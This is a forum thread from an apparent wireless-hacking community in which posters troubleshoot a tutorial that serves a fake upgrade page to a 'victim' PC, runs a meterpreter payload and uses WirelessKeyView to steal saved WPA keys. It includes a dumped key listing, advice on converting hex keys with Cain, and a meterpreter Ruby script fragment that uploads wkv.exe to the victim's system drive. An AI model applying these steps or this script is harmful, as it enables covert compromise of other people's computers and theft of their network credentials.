If this is your first visit, be sure to
check out the Forum Rules by clicking the
link above. You may have to register
before you can post: click the register link above to proceed. To start viewing messages,
select the forum that you want to visit from the selection below.

I went back and tried your tutorial with an XP victim PC and it worked. I configured lighttpd on BT3 and everything appeared to be functional. However, once the victim runs the payload, isn't his connection supposed to forward through eth0? Victim is only receiving your upgrade page. Also, the payload isn't removed, it remains in the temporary internet files.

sorry but no,
nice tutorial,, its been a wile since any good tut's went up.
anyway so i pawned my self and obtained ==================================================
Network Name (SSID): BigPond1967
Key Type : WPA-PSK
Key (Hex) : 3138383234393634323200
Key (Ascii) :
Adapter Name : D-Link AirPlus G DWL-G122 Wireless USB Adapter(rev.C)
Adapter Guid : {********-****-****-****-*************}
==================================================
now thats not my key, or it is my key but in hex, how do i crack the hex out put or even calculate it to me key???

I don't think that will work, it doesnt generate a passphrase, you can use cain/abel in windows and convert the hex to a passphrase but is it really needed, and it does take a while, can you not enter the hex directly?

you should be able to enter hex key directly in ubuntu/bt4, I think i posted it in another thread. Just google "entering 64 character wpa key linux" or something similar

Thanks for the reply hm2075. I realize that I've been looking at two different scripts

However, there are still some problems that Im having issue with. First off, this does not seem to work on Vista clients. I spent days trying to get it working, and finally ran it on XP and it worked no problem. Anyone have luck with Vista?

Second, I understand that you can enter the hex key into Ubuntu, but that is problematic in XP. I've tried your suggestion of using Cain, but the key does not appear to be long enough and crashes Cain. Ideas?

When you type a WPA-PSK key in Windows XP, the characters that you type are automatically converted into a new binary key that contains 32 bytes (64 Hexadecimal digits). This binary key cannot instantly be converted back to the original key that you typed, but you can still use it for connecting the wireless network exactly like the original key. In this case, WirelessKeyView displays this binary key in the Hex key column, but it doesn't display the original key that you typed.
As opposed to Windows XP, Windows Vista doesn't convert the WPA-PSK Key that you type into a new binary key, but it simply keep the original key that you type. So under Windows Vista, the original WPA-PSK key that you typed is displayed in the Ascii key column.

so two things here, vista shows the passphrase where as xp shows the hex key, we learn two things here, wireless key viewer works on xp and vista, and we know the key formats too.

taken from grc

Each of the 64 hexadecimal characters encodes 4 bits of binary data, so the entire 64 characters is equivalent to 256 binary bits — which is the actual binary key length used by the WiFi WPA pre-shared key (PSK). Some WPA-PSK user interfaces (such as the one in Windows XP) allows the 256-bit WPA pre-shared key to be directly provided as 64 hexadecimal characters. This is a precise means for supplying the WPA keying material, but it is ONLY useful if ALL of the devices in a WPA-protected WiFi network allow the 256-bit keying material to be specified as raw hex. If any device did not support this mode of specification (and most do not) it would not be able to join the network

this bit is interesting, is it saying some routers will not accept the key format to be in hex?

to try and convert the key back to passphrase open up cain/abel
click on the cracker tab, right click on the right panel and press add to list, now enter the wpa key in hex, right click again on the essid and change it, finally right click and choose the crack method.

Now you will see if you try to bruteforce then it will take about a 1000 years for a key that is 8 chars, so the bottom line is there is no point trying to convert the hex into a passphrase, you might as well just try and crack the handshake in the first place

so back to square one, we need a way to directly enter the wpa hex key, thats not a problem in ubuntu so i'd say end of discussion.. LOL

# output of wireless key viewer -- what we want here is a random text file to be generated when wkv is ran, otherwise every victim will have the same txt file and you wont know the difference
out = Rex::Text.rand_text_alpha_upper(5) + ".txt"

#upload wireless key viewer --- line 1 is just a comment, line 2 is waiting, line 3 is telling meterpreter to upload our "bin" which is wkv to the system drive on the victim which is mostly c:,the location of of wkv.exe, and then a comment
print_status("Uploading Wireless Key Viewer")
sleep(1)
client.fs.file.upload_file("%SystemDrive%\\#{bin}" , "/root/Desktop/WKV/wkv.exe")
sleep(1)
print_status("Uploaded Wireless Key Viewer")
sleep(1)

Thanks for the response. The Vista problem is before the file is even uploaded. I'm unable to browse to the payload page. The client has received the dhcp information from the attack box, but get "page cannot be displayed" when browsing. I cannot ping the attack box IP or Gateway, I get "Destination Unreachable".

As for the wireless key in hex, this is what I gets dumped into the WKV folder: